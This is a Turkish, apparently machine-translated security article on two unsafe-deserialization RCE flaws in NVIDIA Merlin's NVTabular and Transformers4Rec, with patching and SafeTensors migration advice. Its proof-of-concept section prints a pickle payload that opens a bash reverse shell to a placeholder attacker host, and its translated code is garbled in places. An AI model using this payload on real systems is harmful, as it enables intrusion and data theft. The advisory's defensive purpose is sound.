Yapay zeka altyapı ortamı ciddi bir güvenlik sorunuyla karşı karşıya. NVIDIA Merlinölçekte yüksek performanslı tavsiye sistemleri oluşturmaya yönelik endüstri standardı çerçevenin iki kritik unsur içerdiği tespit edilmiştir Uzaktan Kod Yürütme (RCE) güvenlik açıkları.
Olarak izlenir CVE-2025-33214 ve CVE-2025-33213bu kusurlar NVTabular ve Transformers4Rec kütüphaneler. Python'un veri işlemesindeki temel bir zayıflıktan kaynaklanırlar: Güvensiz Derileştirme (CWE-502).
Saldırganlar, bir sistemi kötü amaçlı bir yapılandırma dosyası veya model kontrol noktası yüklemeye teşvik ederek GPU kümelerini tehlikeye atmak, yapay zeka modellerini zehirlemek veya özel veri kümelerini dışarı sızdırmak için bu kusurlardan yararlanabilir. Bu makale, istismar mekanizmasının teknik bir incelemesini, MLOps işlem hatları üzerindeki etkisini ve zorunlu bir yama stratejisini sunmaktadır.
Güvenlik Açığı Matrisi: Neler Etkilenir?
Güvenlik açıkları Merlin bileşenlerinin veri serileştirme işlemini gerçekleştirme şeklini etkilemektedir-özellikle turşu diskten eserler yüklenirken modül.
| Bileşen | CVE KIMLIĞI | Güvenlik Açığı Türü | Ciddiyet | Etkilenen İşlevsellik |
|---|---|---|---|---|
| NVTabular | CVE-2025-33214 | Güvensiz Derileştirme | Kritik | Kaydedilen İş Akışı nesnelerini şu yolla yükleme İş akışı.load() |
| Transformers4Rec | CVE-2025-33213 | Güvensiz Derileştirme | Kritik | Model kontrol noktalarının ve eğitim konfigürasyonlarının yüklenmesi |
Her iki güvenlik açığının da CVSS puanı 9.8uzaktan (dosya kaynağı uzaktaysa) veya yerel olarak istismar edilebilir olduklarını, kimlik doğrulaması gerektirmediklerini ve sistemin tamamen ele geçirilmesine neden olduklarını belirtir.
Teknik Anatomi: Turşu Zehire Dönüştüğünde
Anlamak için neden Bu CVE'ler çok tehlikeli olduğundan, saldırının altında yatan mekanizmayı analiz etmeliyiz: Python'un turşu serileştirme formatı.
"Turşu" Sorunu
Yalnızca veri formatları olan JSON veya CSV'nin aksine, turşu yığın tabanlı bir sanal makine motorudur. Sadece veri depolamaz; Python nesnelerinin nasıl yeniden yapılandırılacağına ilişkin talimatları da depolar.
Güvenlik açığı __reduce__ yöntemini kullanır. Python bir nesneyi açtığında, eğer bu nesne __reduce__Python, bu yöntem tarafından döndürülen çağrılabilir dosyayı çalıştıracaktır. Meşru nesne yeniden yapılandırması için tasarlanan bu özellik, saldırganların rastgele bayt kodu yerleştirmesine olanak tanır.
Exploit Kod Analizi (Kavramsal PoC)
⚠️ Yasal Uyarı: Aşağıdaki kod yalnızca eğitim ve savunma amaçlı test amaçlıdır.
Bu bağlamda NVTabularbir saldırgan kötü niyetli bir iş akışı dizini. Bir veri bilimci veya otomatik MLOps işlem hattı ETL işlemlerini gerçekleştirmek için bu iş akışını yüklediğinde, yük tetiklenir.
İşte silahlandırılmış bir yük jeneratörü böyle görünür:
Python
`import pickle import os
class MaliciousArtifact(object): def azaltmak(self): # Yük: Bu komut serileştirmenin hemen ardından çalışır. # Gerçek bir saldırıda, bu bir ters kabuk veya C2 işaretçisi olabilir. cmd = "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1′" return (os.system, (cmd,))
Zehir üretin
Bu, tehlikeye atılmış bir model dosyasını veya iş akışı yapılandırmasını simüle eder
exploit_data = pickle.dumps(MaliciousArtifact())
Tetikleyici
NVTabular veya Transformers4Rec içinde buna benzer bir kod çalışır:
Yürütmeden önce dosya içeriği üzerinde herhangi bir doğrulama yapılmaz.
pickle.loads(exploit_data)`
Transformers4Rec Vektörü
İçin Transformers4Rec (CVE-2025-33213), risk genellikle PyTorch model dosyalarının içinde gizlidir (.pt veya .bin). Standart PyTorch kaydetme mekanizmaları turşu Varsayılan olarak, güvenilmeyen bir kaynaktan (örneğin, güvenliği ihlal edilmiş bir Hugging Face deposu) indirilen önceden eğitilmiş herhangi bir model Truva Atı olarak hizmet edebilir.
Etki Analizi: Uzlaşmanın maliyeti
CISO'lar ve Mühendislik Direktörleri neden önemsemeli? Çünkü Merlin boru hatları yüksek değerli altyapılar üzerinde çalışır.
A. GPU Küme Kaçırma (Cryptojacking)
Merlin, NVIDIA A100/H100 GPU'lar için tasarlanmıştır. Bunlar kripto para madenciliği için en çok rağbet gören kaynaklardır. Bir RCE, saldırganların madencileri sessizce yüklemesine olanak tanıyarak şirketlere günlük bulut işlem ücretlerinde binlerce dolara mal olur.
B. Tedarik Zinciri Zehirlenmesi
Bir saldırgan NVTabular (ETL aşaması) aracılığıyla eğitim hattını ele geçirirse, girdi verilerini ince bir şekilde değiştirebilir.
- Sonuç: Model gizli önyargıları veya arka kapıları öğrenir (örneğin, "Her zaman bu belirli ürünü öner" veya "Bu kullanıcı kimliği için dolandırıcılık bayraklarını yok say").
C. Yanal Hareket
Yapay zeka eğitim kümeleri genellikle veri göllerine (S3, Snowflake) ve dahili kod havuzlarına ayrıcalıklı erişime sahiptir. Güvenliği ihlal edilmiş bir düğüm, kurumsal ağın derinliklerine inmek için mükemmel bir sahil noktası görevi görür.
İyileştirme Stratejisi: Yapay Zeka Boru Hattının Güvenliğini Sağlama
NVIDIA yamalar yayınladı ancak gerçek bir düzeltme için kuruluşunuzun yapay zeka eserlerini işleme biçiminde bir değişiklik yapılması gerekiyor.
Aşama 1: Acil Yama ("Kanamayı Durdurma" Aşaması)
Mevcut sürümlerinizi doğrulayın ve aşağıdakileri kullanarak hemen yükseltin pip veya KONDA.
Bash
# NVTabular'ı yamalı sürüme güncelleyin pip install -upgrade nvtabular
Transformers4Rec'i yamalı sürüme güncelleyin
pip install -upgrade transformers4rec`
Doğrulama:
Kurulumdan sonra, Aralık 2025 veya daha sonraki tarihli bir sürümde olduğunuzdan emin olmak için sürüm numaralarını NVIDIA güvenlik bülteniyle karşılaştırın.
2. Aşama: Mimari Güçlendirme ("Sıfır Güven" Aşaması)
1. SafeTensors'a geçiş yapın
Sektör Pickle'dan uzaklaşıyor. SafeTensors Hugging Face tarafından geliştirilen ve tasarımı gereği güvenli olan yeni bir serileştirme formatıdır. Tensörleri tamamen veri olarak saklar ve yükleme sırasında kod yürütülmesini imkansız hale getirir.
Kod Taşıma Örneği:
Python
# ❌ VULNERABLE (Legacy PyTorch/Pickle) torch.save(model.state_dict(), "model.pt") model.load_state_dict(torch.load("model.pt“))
SECURE (SafeTensors)
from safetensors.torch import save_file, load_file
save_file(model.state_dict(), "model.safetensors") load_file(model, "model.safetensors")`
2. Model Taramayı Uygulayın
Bir tarayıcıyı CI/CD işlem hattınıza veya Model Kayıt Defterinize entegre edin. Gibi araçlar Picklescan analiz edebilir .pkl, .ptve .bin dosyalarının yüklenmesine izin verilmeden önce şüpheli bayt kodu imzaları için.
3. Ağ Segmentasyonu (Çıkış Filtreleme)
Eğitim ortamlarınız sınırsız internet erişimine sahip olmamalıdır.
- Blok: Varsayılan olarak tüm giden trafik.
- İzin ver: Yalnızca belirli, güvenilir etki alanları (örneğin, dahili PyPI yansıları, belirli S3 kovaları).
- Neden? Bu, bir ters kabuğun (yukarıdaki PoC'deki gibi) saldırganın Komuta ve Kontrol sunucusuna geri bağlanmasını engeller.
Sonuç
CVE-2025-33214 ve CVE-2025-33213'ün ifşa edilmesi, yapay zeka endüstrisi için bir uyandırma çağrısı niteliğindedir. Artık model dosyalarını ve veri iş akışlarını iyi huylu statik varlıklar olarak ele alamayız; bunlar çalıştırılabilir kodlardır.
Yapay zeka kritik iş operasyonlarına daha derinlemesine entegre oldukça, MLOps işlem hattını güvence altına almak, web uygulamasının kendisini güvence altına almak kadar önemlidir.
Bugün için Eylem Planı:
- Denetim: Koşmak
pip listesitüm eğitim konteynerlerinde. - Yama: En son NVIDIA Merlin sürümlerini dağıtın.
- Yeniden düzenle: Pickle'ı SafeTensors ile değiştirmek için yol haritasına başlayın.
